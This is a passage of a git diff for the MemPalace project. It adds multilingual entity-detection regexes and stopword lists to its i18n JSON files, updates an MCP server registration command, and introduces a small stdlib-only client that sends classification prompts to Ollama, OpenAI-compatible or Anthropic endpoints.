+      "\\b{name}\\s+hasst\\b",
+      "\\b{name}\\s+weiß\\b",
+      "\\b{name}\\s+entschied\\b",
+      "\\b{name}\\s+schrieb\\b"
+    ],
+    "pronoun_patterns": [
+      "\\ber\\b",
+      "\\bsie\\b",
+      "\\bes\\b",
+      "\\bihn\\b",
+      "\\bihm\\b",
+      "\\bihr\\b",
+      "\\bsein\\b",
+      "\\bihre\\b",
+      "\\bihnen\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+sagte"
+    ],
+    "direct_address_pattern": "\\bhallo\\s+{name}\\b|\\bhi\\s+{name}\\b|\\bhey\\s+{name}\\b|\\bdanke\\s+{name}\\b|\\bservus\\s+{name}\\b|\\blieber\\s+{name}\\b|\\bliebe\\s+{name}\\b|\\bsehr\\s+geehrter\\s+{name}\\b|\\bsehr\\s+geehrte\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bbaue\\s+{name}\\b",
+      "\\bgebaut\\s+{name}\\b",
+      "\\bstarte\\s+{name}\\b",
+      "\\bgestartet\\s+{name}\\b",
+      "\\bdeploye\\s+{name}\\b",
+      "\\binstalliert\\s+{name}\\b",
+      "\\bdie\\s+{name}\\s+architektur\\b",
+      "\\bdie\\s+{name}\\s+pipeline\\b",
+      "\\bdas\\s+{name}\\s+system\\b",
+      "\\bdas\\s+{name}\\s+repository\\b",
+      "\\b{name}\\s+v\\d+\\b",
+      "\\b{name}\\.py\\b",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "der", "die", "das", "ein", "eine", "eines", "einer", "einem", "einen",
+      "den", "dem", "des", "und", "oder", "aber", "denn", "weil", "wenn", "als",
+      "ob", "auch", "noch", "schon", "sehr", "viel", "nur", "nicht", "mehr",
+      "kann", "wird", "hat", "ist", "sind", "war", "waren", "sein", "haben",
+      "wurde", "worden", "werden", "mit", "von", "zu", "für", "auf", "in",
+      "an", "um", "über", "nach", "durch", "bei", "aus", "seit", "vor", "zwischen",
+      "ich", "du", "er", "sie", "es", "wir", "ihr", "mich", "dich", "mir", "dir",
+      "uns", "euch", "mein", "dein", "unser", "euer", "ihre", "seine",
+      "wer", "was", "wann", "wo", "wie", "warum", "welcher", "welche", "welches",
+      "so", "dann", "jetzt", "heute", "gestern", "morgen", "hier", "dort", "da",
+      "immer", "nie", "manchmal", "oft", "selten", "bald", "spät",
+      "ja", "nein", "vielleicht", "gut", "schlecht", "besser", "bitte", "danke",
+      "hallo", "hi", "hey", "tschüss",
+      "tag", "tage", "woche", "monat", "jahr", "jahre", "zeit", "welt", "leben",
+      "mensch", "menschen", "leute", "person", "ding", "dinge", "sache", "sachen",
+      "teil", "art", "weise", "stelle", "platz", "ort", "zimmer", "haus", "land",
+      "grund", "frage", "antwort", "fakt", "sinn", "idee", "punkt", "fall", "aspekt",
+      "beispiel", "version", "nummer", "zahl", "name", "namen", "system", "modell",
+      "sprache", "technologie", "gesellschaft", "kultur", "geschichte",
+      "wissenschaft", "zukunft", "erinnerung", "gedächtnis",
+      "datei", "ordner", "pfad", "schlüssel", "wert", "fehler", "warnung",
+      "ergebnis", "eingabe", "ausgabe", "quelle", "ziel", "daten", "elemente",
+      "montag", "dienstag", "mittwoch", "donnerstag", "freitag", "samstag", "sonntag",
+      "januar", "februar", "märz", "april", "mai", "juni", "juli", "august",
+      "september", "oktober", "november", "dezember"
+    ]
   }
 }
diff --git a/mempalace/i18n/en.json b/mempalace/i18n/en.json
index 6a9dff925..39d9ac140 100644
--- a/mempalace/i18n/en.json
+++ b/mempalace/i18n/en.json
@@ -42,7 +42,7 @@
     "action_pattern": "(?:built|fixed|wrote|added|pushed|measured|tested|reviewed|created|deleted|updated|configured|deployed|migrated)\\s+[\\w\\s]{3,30}"
   },
   "entity": {
-    "candidate_pattern": "[A-Z][a-z]{1,19}",
+    "candidate_pattern": "[A-Z][a-z]+(?:[A-Z][a-z]+|[A-Z]{2,})+|[A-Z][a-z]{1,19}",
     "multi_word_pattern": "[A-Z][a-z]+(?:\\s+[A-Z][a-z]+)+",
     "person_verb_patterns": [
       "\\b{name}\\s+said\\b",
@@ -140,7 +140,17 @@
       "agents", "tools", "others", "guards", "ethics", "regulation",
       "learning", "thinking", "memory", "language", "intelligence",
       "technology", "society", "culture", "future", "history", "science",
-      "model", "models", "network", "networks", "training", "inference"
+      "model", "models", "network", "networks", "training", "inference",
+      "created", "updated", "deleted", "added", "removed", "modified",
+      "extracted", "processed", "generated", "compiled", "launched", "installed",
+      "deployed", "executed", "loaded", "parsed", "validated", "configured",
+      "total", "summary", "covered", "included", "pending", "failed", "success",
+      "ready", "active", "disabled", "enabled", "available", "completed",
+      "auto", "multi", "mini", "micro", "meta", "super", "hybrid",
+      "context", "bridge", "batch", "local", "global", "native", "cloud",
+      "before", "after", "during", "often", "always", "never",
+      "project", "contributor", "software",
+      "backend", "frontend", "server", "client", "service", "app", "api"
     ]
   }
 }
diff --git a/mempalace/i18n/es.json b/mempalace/i18n/es.json
index aa30e1bcb..dd490aab9 100644
--- a/mempalace/i18n/es.json
+++ b/mempalace/i18n/es.json
@@ -40,5 +40,89 @@
     "stop_words": "el la los las un una unos unas de del al en con por para su sus mi mis tu tus es son está están fue ser estar haber sido como pero más muy también todo todos toda todas este esta estos estas ese esa esos esas que quien cual donde cuando porque aunque sin",
     "quote_pattern": "\"([^\"]{10,200})\"|«([^»]{10,200})»",
     "action_pattern": "(?:construido|corregido|escrito|añadido|enviado|medido|probado|revisado|creado|eliminado|actualizado|configurado|desplegado|migrado)\\s+[\\wá-ú\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[A-ZÁÉÍÓÚÑÜ][a-záéíóúñü]{1,19}",
+    "multi_word_pattern": "[A-ZÁÉÍÓÚÑÜ][a-záéíóúñü]+(?:\\s+[A-ZÁÉÍÓÚÑÜ][a-záéíóúñü]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+dijo\\b",
+      "\\b{name}\\s+preguntó\\b",
+      "\\b{name}\\s+respondió\\b",
+      "\\b{name}\\s+contó\\b",
+      "\\b{name}\\s+rió\\b",
+      "\\b{name}\\s+sonrió\\b",
+      "\\b{name}\\s+lloró\\b",
+      "\\b{name}\\s+sintió\\b",
+      "\\b{name}\\s+piensa\\b",
+      "\\b{name}\\s+quiere\\b",
+      "\\b{name}\\s+ama\\b",
+      "\\b{name}\\s+odia\\b",
+      "\\b{name}\\s+sabe\\b",
+      "\\b{name}\\s+decidió\\b",
+      "\\b{name}\\s+escribió\\b"
+    ],
+    "pronoun_patterns": [
+      "\\bél\\b",
+      "\\bella\\b",
+      "\\bellos\\b",
+      "\\bellas\\b",
+      "\\blo\\b",
+      "\\bla\\b",
+      "\\ble\\b",
+      "\\bles\\b",
+      "\\bse\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+dijo"
+    ],
+    "direct_address_pattern": "\\bhola\\s+{name}\\b|\\bhey\\s+{name}\\b|\\bhi\\s+{name}\\b|\\bgracias\\s+{name}\\b|\\bquerido\\s+{name}\\b|\\bquerida\\s+{name}\\b|\\bestimado\\s+{name}\\b|\\bestimada\\s+{name}\\b|\\bdon\\s+{name}\\b|\\bdoña\\s+{name}\\b|\\bseñor\\s+{name}\\b|\\bseñora\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bconstruyo\\s+{name}\\b",
+      "\\bconstruí\\s+{name}\\b",
+      "\\barmé\\s+{name}\\b",
+      "\\blancé\\s+{name}\\b",
+      "\\bdesplegué\\s+{name}\\b",
+      "\\binstalé\\s+{name}\\b",
+      "\\bla\\s+arquitectura\\s+{name}\\b",
+      "\\bel\\s+pipeline\\s+{name}\\b",
+      "\\bel\\s+sistema\\s+{name}\\b",
+      "\\bel\\s+proyecto\\s+{name}\\b",
+      "\\bel\\s+repositorio\\s+{name}\\b",
+      "\\b{name}\\s+v\\d+\\b",
+      "\\b{name}\\.py\\b",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "el", "la", "los", "las", "un", "una", "unos", "unas",
+      "de", "del", "al", "a", "en", "con", "sin", "por", "para", "sobre",
+      "entre", "hasta", "desde", "hacia", "contra", "según", "tras",
+      "y", "o", "u", "ni", "pero", "sino", "aunque", "porque", "pues",
+      "que", "quien", "quienes", "cual", "cuales", "cuyo", "cuya",
+      "donde", "cuando", "como", "cuanto", "cuanta",
+      "yo", "tú", "él", "ella", "nosotros", "vosotros", "ellos", "ellas",
+      "me", "te", "se", "nos", "os", "lo", "la", "le", "los", "las", "les",
+      "mi", "mis", "tu", "tus", "su", "sus", "nuestro", "nuestra", "vuestro",
+      "este", "esta", "estos", "estas", "ese", "esa", "esos", "esas",
+      "aquel", "aquella", "aquellos", "aquellas", "esto", "eso", "aquello",
+      "ser", "estar", "haber", "tener", "hacer", "poder", "querer", "saber",
+      "es", "son", "fue", "fueron", "era", "eran", "está", "están", "estaba",
+      "he", "ha", "hemos", "han", "había", "hay",
+      "muy", "mucho", "mucha", "muchos", "muchas", "poco", "poca", "pocos", "pocas",
+      "más", "menos", "tan", "tanto", "también", "tampoco",
+      "sí", "no", "quizás", "tal", "vez",
+      "aquí", "allí", "allá", "ahí", "acá",
+      "hoy", "ayer", "mañana", "ahora", "antes", "después", "luego", "entonces",
+      "siempre", "nunca", "jamás", "todavía", "aún", "ya",
+      "bien", "mal", "mejor", "peor", "bueno", "buena", "malo", "mala",
+      "gracias", "hola", "adiós", "por favor", "perdón",
+      "día", "días", "semana", "mes", "año", "años", "tiempo", "vez", "veces",
+      "cosa", "cosas", "persona", "gente", "mundo", "vida", "casa", "lugar",
+      "forma", "manera", "parte", "caso", "punto", "idea", "hecho", "razón",
+      "nombre", "número", "versión", "sistema", "modelo"
+    ]
   }
 }
diff --git a/mempalace/i18n/fr.json b/mempalace/i18n/fr.json
index 2e3d0b9e3..86df08c72 100644
--- a/mempalace/i18n/fr.json
+++ b/mempalace/i18n/fr.json
@@ -40,5 +40,87 @@
     "stop_words": "le la les un une des de du au aux en et ou mais donc or ni car que qui ce cette ces son sa ses mon ma mes ton ta tes leur leurs nous vous ils elles on ne pas plus très bien aussi avec pour dans sur par est sont fait être avoir été comme tout tous toute toutes",
     "quote_pattern": "«\\s*([^»]{10,200})\\s*»|\"([^\"]{10,200})\"",
     "action_pattern": "(?:construit|corrigé|écrit|ajouté|poussé|mesuré|testé|révisé|créé|supprimé|mis à jour|configuré|déployé|migré)\\s+[\\wà-ÿ\\s]{3,30}"
+  },
+  "entity": {
+    "candidate_pattern": "[A-ZÀÂÄÇÉÈÊËÎÏÔÖÙÛÜŸÆŒ][a-zàâäçéèêëîïôöùûüÿæœ]{1,19}",
+    "multi_word_pattern": "[A-ZÀÂÄÇÉÈÊËÎÏÔÖÙÛÜŸÆŒ][a-zàâäçéèêëîïôöùûüÿæœ]+(?:\\s+[A-ZÀÂÄÇÉÈÊËÎÏÔÖÙÛÜŸÆŒ][a-zàâäçéèêëîïôöùûüÿæœ]+)+",
+    "person_verb_patterns": [
+      "\\b{name}\\s+a\\s+dit\\b",
+      "\\b{name}\\s+a\\s+demandé\\b",
+      "\\b{name}\\s+a\\s+répondu\\b",
+      "\\b{name}\\s+a\\s+raconté\\b",
+      "\\b{name}\\s+a\\s+ri\\b",
+      "\\b{name}\\s+a\\s+souri\\b",
+      "\\b{name}\\s+a\\s+pleuré\\b",
+      "\\b{name}\\s+a\\s+senti\\b",
+      "\\b{name}\\s+pense\\b",
+      "\\b{name}\\s+veut\\b",
+      "\\b{name}\\s+aime\\b",
+      "\\b{name}\\s+déteste\\b",
+      "\\b{name}\\s+sait\\b",
+      "\\b{name}\\s+a\\s+décidé\\b",
+      "\\b{name}\\s+a\\s+écrit\\b"
+    ],
+    "pronoun_patterns": [
+      "\\bil\\b",
+      "\\belle\\b",
+      "\\blui\\b",
+      "\\bils\\b",
+      "\\belles\\b",
+      "\\bleur\\b",
+      "\\bleurs\\b",
+      "\\beux\\b",
+      "\\bse\\b"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:\\s]",
+      "^{name}:\\s",
+      "^\\[{name}\\]",
+      "\"{name}\\s+a\\s+dit"
+    ],
+    "direct_address_pattern": "\\bbonjour\\s+{name}\\b|\\bsalut\\s+{name}\\b|\\bmerci\\s+{name}\\b|\\bcher\\s+{name}\\b|\\bchère\\s+{name}\\b|\\bmonsieur\\s+{name}\\b|\\bmadame\\s+{name}\\b|\\bhey\\s+{name}\\b|\\bhi\\s+{name}\\b",
+    "project_verb_patterns": [
+      "\\bconstruit\\s+{name}\\b",
+      "\\blancé\\s+{name}\\b",
+      "\\bdéployé\\s+{name}\\b",
+      "\\binstallé\\s+{name}\\b",
+      "\\bl'architecture\\s+{name}\\b",
+      "\\ble\\s+pipeline\\s+{name}\\b",
+      "\\ble\\s+système\\s+{name}\\b",
+      "\\ble\\s+projet\\s+{name}\\b",
+      "\\ble\\s+dépôt\\s+{name}\\b",
+      "\\b{name}\\s+v\\d+\\b",
+      "\\b{name}\\.py\\b",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "le", "la", "les", "un", "une", "des", "du", "de", "au", "aux",
+      "en", "dans", "sur", "sous", "avec", "sans", "pour", "par", "vers",
+      "chez", "entre", "depuis", "pendant", "avant", "après", "jusqu",
+      "et", "ou", "mais", "donc", "or", "ni", "car", "que", "qui",
+      "dont", "où", "quand", "comment", "pourquoi", "combien", "lequel",
+      "ce", "cet", "cette", "ces", "celui", "celle", "ceux", "celles",
+      "mon", "ma", "mes", "ton", "ta", "tes", "son", "sa", "ses",
+      "notre", "nos", "votre", "vos", "leur", "leurs",
+      "je", "tu", "il", "elle", "on", "nous", "vous", "ils", "elles",
+      "me", "te", "se", "lui", "eux",
+      "être", "avoir", "faire", "dire", "aller", "voir", "savoir", "pouvoir",
+      "est", "sont", "était", "étaient", "fut", "furent", "sera", "seront",
+      "ai", "as", "a", "avons", "avez", "ont", "avait", "avaient",
+      "très", "bien", "mal", "peu", "beaucoup", "trop", "assez", "aussi",
+      "plus", "moins", "tant", "si", "tellement",
+      "oui", "non", "peut-être", "vraiment",
+      "ici", "là", "là-bas", "partout", "ailleurs",
+      "aujourd'hui", "hier", "demain", "maintenant", "alors", "ensuite",
+      "toujours", "jamais", "souvent", "parfois", "déjà", "encore",
+      "bon", "bonne", "mauvais", "mauvaise", "meilleur", "pire",
+      "merci", "bonjour", "salut", "au revoir",
+      "jour", "jours", "semaine", "mois", "année", "temps", "fois",
+      "chose", "choses", "personne", "gens", "monde", "vie", "maison",
+      "endroit", "lieu", "partie", "façon", "manière", "sorte", "type",
+      "cas", "point", "idée", "fait", "raison", "nom", "nombre",
+      "version", "système", "modèle", "question", "réponse"
+    ]
   }
 }
diff --git a/mempalace/i18n/zh-CN.json b/mempalace/i18n/zh-CN.json
index 4e41a5714..7a708cf0a 100644
--- a/mempalace/i18n/zh-CN.json
+++ b/mempalace/i18n/zh-CN.json
@@ -40,5 +40,93 @@
     "stop_words": "的 了 在 是 我 有 和 就 不 人 都 一 一个 上 也 很 到 说 要 去 你 会 着 没有 看 好 自己 这 那 她 他 它 们 但是 因为 所以 如果 虽然 然后 或者 而且",
     "quote_pattern": "\\u201C([^\\u201D]{10,100})\\u201D|\"([^\"]{10,200})\"",
     "action_pattern": "(构建|修复|添加|删除|确认|创建|实现|修理|编写|测试|验证|更新|配置|启动|停止)(?:了|完成|成功)"
+  },
+  "entity": {
+    "boundary_chars": "\\u4E00-\\u9FFF",
+    "candidate_pattern": "[王李张刘陈杨赵黄周吴徐孙朱胡郭何高林罗郑梁谢宋唐许韩冯邓曹彭曾萧田董袁潘于蒋蔡余杜叶程苏魏吕丁任沈姚卢姜崔钟谭陆汪范金石廖贾夏韦方白邹孟熊秦邱江尹薛阎段雷侯龙史陶黎贺顾毛郝龚邵万钱严武戴莫孔向汤温庞殷章葛管甘卞冉蓝殷习][\\u4E00-\\u9FFF]{1,2}",
+    "person_verb_patterns": [
+      "{name}说",
+      "{name}问",
+      "{name}答",
+      "{name}表示",
+      "{name}回答",
+      "{name}提出",
+      "{name}决定",
+      "{name}认为",
+      "{name}指出",
+      "{name}解释",
+      "{name}告诉",
+      "{name}写道",
+      "{name}想",
+      "{name}觉得",
+      "{name}知道",
+      "{name}喜欢",
+      "{name}讨厌",
+      "{name}确认",
+      "{name}提醒",
+      "{name}分享",
+      "{name}建议",
+      "{name}同意",
+      "{name}反对"
+    ],
+    "pronoun_patterns": [
+      "他们",
+      "她们",
+      "他",
+      "她",
+      "它",
+      "您",
+      "咱"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:：\\s]",
+      "^{name}[:：]\\s?",
+      "^\\[{name}\\]",
+      "\u201C{name}[\u201D:：]",
+      "「{name}[」:：]"
+    ],
+    "direct_address_pattern": "嘿\\s*{name}|喂\\s*{name}|谢谢\\s*{name}|感谢\\s*{name}|哈喽\\s*{name}|亲爱的\\s*{name}",
+    "project_verb_patterns": [
+      "建立{name}",
+      "打造{name}",
+      "部署{name}",
+      "启动{name}",
+      "发布{name}",
+      "上线{name}",
+      "开发{name}",
+      "维护{name}",
+      "{name}系统",
+      "{name}平台",
+      "{name}项目",
+      "{name}架构",
+      "{name}管线",
+      "{name}v\\d+",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "的", "了", "着", "过", "得", "地", "吗", "吧", "呢", "啊", "喔", "耶",
+      "我", "你", "妳", "他", "她", "它", "您", "咱",
+      "我们", "你们", "妳们", "他们", "她们", "它们", "咱们",
+      "自己", "大家", "有人", "没人",
+      "今天", "明天", "昨天", "前天", "后天", "今年", "明年", "去年",
+      "早上", "下午", "晚上", "中午", "凌晨",
+      "现在", "刚才", "刚刚", "等等", "等下", "待会",
+      "最近", "以前", "之前", "之后", "以后", "后来",
+      "什么", "为什么", "怎么", "怎样", "哪里", "哪个",
+      "这个", "那个", "这里", "那里", "这些", "那些", "这样", "那样",
+      "但是", "可是", "然后", "所以", "因为", "如果", "虽然",
+      "而且", "或者", "或是", "还是", "不过", "只是", "不只",
+      "既然", "不然", "否则", "此外", "另外",
+      "很", "非常", "相当", "真的", "确实", "当然", "其实",
+      "已经", "正在", "即将", "将要", "刚好", "恰好",
+      "可能", "也许", "或许", "大概", "应该", "必须", "一定",
+      "完成", "执行", "进行", "开始", "结束", "继续", "停止", "完毕",
+      "没有", "有点", "有些", "一些", "许多", "很多",
+      "问题", "答案", "原因", "结果", "情况", "状况",
+      "主要", "重要", "基本", "简单", "复杂", "特别",
+      "谢谢", "感谢", "对不起", "不好意思", "请问",
+      "欢迎", "再见", "你好", "您好", "哈喽", "拜拜"
+    ]
   }
 }
diff --git a/mempalace/i18n/zh-TW.json b/mempalace/i18n/zh-TW.json
index b65552bce..db3f2ad0d 100644
--- a/mempalace/i18n/zh-TW.json
+++ b/mempalace/i18n/zh-TW.json
@@ -40,5 +40,93 @@
     "stop_words": "的 了 在 是 我 有 和 就 不 人 都 一 一個 上 也 很 到 說 要 去 你 會 著 沒有 看 好 自己 這 那 她 他 它 們 但是 因為 所以 如果 雖然 然後 或者 而且",
     "quote_pattern": "「([^」]{10,100})」|\u201c([^\u201d]{10,100})\u201d",
     "action_pattern": "(構建|修復|添加|刪除|確認|創建|實現|修理|編寫|測試|驗證|更新|配置|啟動|停止)(?:了|完成|成功)"
+  },
+  "entity": {
+    "boundary_chars": "\\u4E00-\\u9FFF",
+    "candidate_pattern": "[王李張劉陳楊趙黃周吳徐孫朱胡郭何高林羅鄭梁謝宋唐許韓馮鄧曹彭曾蕭田董袁潘于蔣蔡余杜葉程蘇魏呂丁任沈姚盧姜崔鍾譚陸汪范金石廖賈夏韋方白鄒孟熊秦邱江尹薛閻段雷侯龍史陶黎賀顧毛郝龔邵萬錢嚴武戴莫孔向湯溫龐殷章葛管甘卞冉藍殷習][\\u4E00-\\u9FFF]{1,2}",
+    "person_verb_patterns": [
+      "{name}說",
+      "{name}問",
+      "{name}答",
+      "{name}表示",
+      "{name}回答",
+      "{name}提出",
+      "{name}決定",
+      "{name}認為",
+      "{name}指出",
+      "{name}解釋",
+      "{name}告訴",
+      "{name}寫道",
+      "{name}想",
+      "{name}覺得",
+      "{name}知道",
+      "{name}喜歡",
+      "{name}討厭",
+      "{name}確認",
+      "{name}提醒",
+      "{name}分享",
+      "{name}建議",
+      "{name}同意",
+      "{name}反對"
+    ],
+    "pronoun_patterns": [
+      "他們",
+      "她們",
+      "他",
+      "她",
+      "它",
+      "您",
+      "咱"
+    ],
+    "dialogue_patterns": [
+      "^>\\s*{name}[:：\\s]",
+      "^{name}[:：]\\s?",
+      "^\\[{name}\\]",
+      "「{name}[」:：]",
+      "『{name}[』:：]"
+    ],
+    "direct_address_pattern": "嘿\\s*{name}|喂\\s*{name}|謝謝\\s*{name}|感謝\\s*{name}|哈囉\\s*{name}|親愛的\\s*{name}",
+    "project_verb_patterns": [
+      "建立{name}",
+      "打造{name}",
+      "部署{name}",
+      "啟動{name}",
+      "發布{name}",
+      "上線{name}",
+      "開發{name}",
+      "維護{name}",
+      "{name}系統",
+      "{name}平台",
+      "{name}專案",
+      "{name}架構",
+      "{name}管線",
+      "{name}v\\d+",
+      "\\bimport\\s+{name}\\b",
+      "\\bpip\\s+install\\s+{name}\\b"
+    ],
+    "stopwords": [
+      "的", "了", "著", "過", "得", "地", "嗎", "吧", "呢", "啊", "喔", "耶",
+      "我", "你", "妳", "他", "她", "它", "您", "咱",
+      "我們", "你們", "妳們", "他們", "她們", "它們", "咱們",
+      "自己", "大家", "有人", "沒人",
+      "今天", "明天", "昨天", "前天", "後天", "今年", "明年", "去年",
+      "早上", "下午", "晚上", "中午", "凌晨",
+      "現在", "剛才", "剛剛", "等等", "等下", "待會",
+      "最近", "以前", "之前", "之後", "以後", "後來",
+      "什麼", "甚麼", "為什麼", "怎麼", "怎樣", "哪裡", "哪個",
+      "這個", "那個", "這裡", "那裡", "這些", "那些", "這樣", "那樣",
+      "但是", "可是", "然後", "所以", "因為", "如果", "雖然",
+      "而且", "或者", "或是", "還是", "不過", "只是", "不只",
+      "既然", "不然", "否則", "此外", "另外",
+      "很", "非常", "相當", "真的", "確實", "當然", "其實",
+      "已經", "正在", "即將", "將要", "剛好", "恰好",
+      "可能", "也許", "或許", "大概", "應該", "必須", "一定",
+      "完成", "執行", "進行", "開始", "結束", "繼續", "停止", "完畢",
+      "沒有", "有點", "有些", "一些", "許多", "很多",
+      "問題", "答案", "原因", "結果", "情況", "狀況",
+      "主要", "重要", "基本", "簡單", "複雜", "特別",
+      "謝謝", "感謝", "對不起", "不好意思", "請問",
+      "歡迎", "再見", "你好", "您好", "哈囉", "掰掰"
+    ]
   }
 }
diff --git a/mempalace/instructions/init.md b/mempalace/instructions/init.md
index 40f0c20dd..570a52541 100644
--- a/mempalace/instructions/init.md
+++ b/mempalace/instructions/init.md
@@ -49,7 +49,7 @@ If this fails, report the error and stop.
 
 Run the following command to register the MemPalace MCP server with Claude:
 
-    claude mcp add mempalace -- python -m mempalace.mcp_server
+    claude mcp add mempalace -- mempalace-mcp
 
 If this fails, report the error but continue to the next step (MCP
 configuration can be done manually later).
diff --git a/mempalace/llm_client.py b/mempalace/llm_client.py
new file mode 100644
index 000000000..74982cea1
--- /dev/null
+++ b/mempalace/llm_client.py
@@ -0,0 +1,305 @@
+"""
+llm_client.py — Minimal provider abstraction for LLM-assisted entity refinement.
+
+Three providers cover the useful space:
+
+- ``ollama`` (default): local models via http://localhost:11434. Works fully
+  offline. Honors MemPalace's "zero-API required" principle.
+- ``openai-compat``: any OpenAI-compatible ``/v1/chat/completions`` endpoint.
+  Covers OpenRouter, LM Studio, llama.cpp server, vLLM, Groq, Fireworks,
+  Together, and most self-hosted setups.
+- ``anthropic``: the official Messages API. Opt-in for users who want Haiku
+  quality without setting up a local model.
+
+All providers expose the same ``classify(system, user, json_mode)`` method and
+the same ``check_available()`` probe. No external SDK dependencies — stdlib
+``urllib`` only.
+
+JSON mode matters here: we always ask for structured output. Providers
+differ on how to request it (Ollama: ``format: json``; OpenAI-compat:
+``response_format``; Anthropic: prompt-level instruction) and this module
+normalizes that away from the caller.
+"""
+
+from __future__ import annotations
+
+import json
+import os
+from dataclasses import dataclass
+from typing import Optional
+from urllib.error import HTTPError, URLError
+from urllib.request import Request, urlopen
+
+
+class LLMError(RuntimeError):
+    """Raised for any provider failure — transport, parse, auth, missing model."""
+
+
+@dataclass
+class LLMResponse:
+    text: str
+    model: str
+    provider: str
+    raw: dict
+
+
+# ==================== BASE ====================
+
+
+class LLMProvider:
+    name: str = "base"  # provider id; subclasses override it and copy it into LLMResponse.provider
+
+    def __init__(
+        self,
+        model: str,
+        endpoint: Optional[str] = None,
+        api_key: Optional[str] = None,
+        timeout: int = 120,
+    ) -> None:
+        self.model = model
+        self.endpoint = endpoint  # provider URL; subclasses may substitute a default
+        self.api_key = api_key
+        self.timeout = timeout  # passed through to urlopen() by the subclasses' classify()
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        raise NotImplementedError  # subclasses POST the prompts and wrap the reply in LLMResponse
+
+    def check_available(self) -> tuple[bool, str]:
+        """Return ``(ok, message)``. Fast probe that the provider is reachable."""
+        raise NotImplementedError
+
+
+def _http_post_json(url: str, body: dict, headers: dict, timeout: int) -> dict:
+    """POST JSON and return the parsed response. Raises LLMError on any failure."""
+    req = Request(
+        url,
+        data=json.dumps(body).encode("utf-8"),
+        headers={"Content-Type": "application/json", **headers},
+    )
+    try:
+        with urlopen(req, timeout=timeout) as resp:
+            return json.loads(resp.read())
+    except HTTPError as e:
+        detail = ""
+        try:
+            detail = e.read().decode("utf-8", errors="replace")[:500]
+        except Exception:
+            pass
+        raise LLMError(f"HTTP {e.code} from {url}: {detail or e.reason}") from e
+    except (URLError, OSError) as e:
+        raise LLMError(f"Cannot reach {url}: {e}") from e
+    except json.JSONDecodeError as e:
+        raise LLMError(f"Malformed response from {url}: {e}") from e
+
+
+# ==================== OLLAMA ====================
+
+
+class OllamaProvider(LLMProvider):
+    name = "ollama"
+    DEFAULT_ENDPOINT = "http://localhost:11434"
+
+    def __init__(
+        self,
+        model: str,
+        endpoint: Optional[str] = None,
+        timeout: int = 180,
+        **_: object,
+    ):
+        super().__init__(
+            model=model,
+            endpoint=endpoint or self.DEFAULT_ENDPOINT,
+            timeout=timeout,
+        )
+
+    def check_available(self) -> tuple[bool, str]:
+        try:
+            with urlopen(f"{self.endpoint}/api/tags", timeout=5) as resp:
+                data = json.loads(resp.read())
+        except (URLError, HTTPError, OSError, json.JSONDecodeError) as e:
+            return False, f"Cannot reach Ollama at {self.endpoint}: {e}"
+        names = {m.get("name", "") for m in data.get("models", []) or []}
+        # Ollama tags may or may not include ':latest' — accept either form
+        wanted = {self.model, f"{self.model}:latest"}
+        if not names & wanted:
+            return (
+                False,
+                f"Model '{self.model}' not loaded in Ollama. Run: ollama pull {self.model}",
+            )
+        return True, "ok"
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        body: dict = {
+            "model": self.model,
+            "messages": [
+                {"role": "system", "content": system},
+                {"role": "user", "content": user},
+            ],
+            "stream": False,
+            "options": {"temperature": 0.1},
+        }
+        if json_mode:
+            body["format"] = "json"
+        data = _http_post_json(f"{self.endpoint}/api/chat", body, headers={}, timeout=self.timeout)
+        text = (data.get("message") or {}).get("content", "")
+        if not text:
+            raise LLMError(f"Empty response from Ollama (model={self.model})")
+        return LLMResponse(text=text, model=self.model, provider=self.name, raw=data)
+
+
+# ==================== OPENAI-COMPAT ====================
+
+
+class OpenAICompatProvider(LLMProvider):
+    """Any OpenAI-compatible ``/v1/chat/completions`` endpoint.
+
+    Supply ``--llm-endpoint http://host:port`` (with or without ``/v1``).
+    API key via ``--llm-api-key`` or the ``OPENAI_API_KEY`` env var.
+    """
+
+    name = "openai-compat"
+
+    def __init__(
+        self,
+        model: str,
+        endpoint: Optional[str] = None,
+        api_key: Optional[str] = None,
+        timeout: int = 120,
+        **_: object,
+    ):
+        resolved_key = api_key or os.environ.get("OPENAI_API_KEY")
+        super().__init__(model=model, endpoint=endpoint, api_key=resolved_key, timeout=timeout)
+
+    def _resolve_url(self) -> str:
+        if not self.endpoint:
+            raise LLMError("openai-compat provider requires --llm-endpoint")
+        url = self.endpoint.rstrip("/")
+        if url.endswith("/chat/completions"):
+            return url
+        if not url.endswith("/v1"):
+            url = f"{url}/v1"
+        return f"{url}/chat/completions"
+
+    def check_available(self) -> tuple[bool, str]:
+        if not self.endpoint:
+            return False, "no --llm-endpoint configured"
+        base = self.endpoint.rstrip("/")
+        base = base.removesuffix("/chat/completions").removesuffix("/v1")
+        try:
+            req = Request(f"{base}/v1/models")
+            if self.api_key:
+                req.add_header("Authorization", f"Bearer {self.api_key}")
+            with urlopen(req, timeout=5):
+                pass
+        except (URLError, HTTPError, OSError) as e:
+            return False, f"Cannot reach {self.endpoint}: {e}"
+        return True, "ok"
+
+    def classify(self, system: str, user: str, json_mode: bool = True) -> LLMResponse:
+        body: dict = {
+            "model": self.model,
+            "messages": [
+                {"role": "system", "content": system},
+                {"role": "user", "content": user},
+            ],
+            "temperature": 0.1,
+        }
+        if json_mode:
+            body["response_format"] = {"type": "json_object"}
+        headers = {}
+        if self.api_key:
+            headers["Authorization"] = f"Bearer {self.api_key}"
